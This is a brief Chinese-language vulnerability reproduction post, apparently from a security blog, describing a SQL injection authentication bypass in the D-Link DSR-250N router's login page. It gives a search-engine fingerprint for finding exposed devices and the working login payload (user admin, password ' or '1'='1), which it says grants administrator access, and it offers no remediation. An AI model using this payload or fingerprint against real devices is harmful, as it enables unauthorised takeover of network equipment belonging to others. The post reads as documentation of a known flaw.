D-Link DSR-250N SQL注入漏洞

漏洞描述

D-Link DSR-250N 存在万能密码漏洞,攻击者通过漏洞可以获取后台权限。

漏洞影响

D-Link DSR-250N

网络测绘

app=”D_Link-DSR-250N”

漏洞复现

登录页面如下

20240323113850483-image-20210609175053339.28936b20_2024-03-23_11-38-38 (1)

user: admin
pass: ' or '1'='1

成功登录后台

20240323113943658-image-20210609175150907.4ab18e18_2024-03-23_11-39-10 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容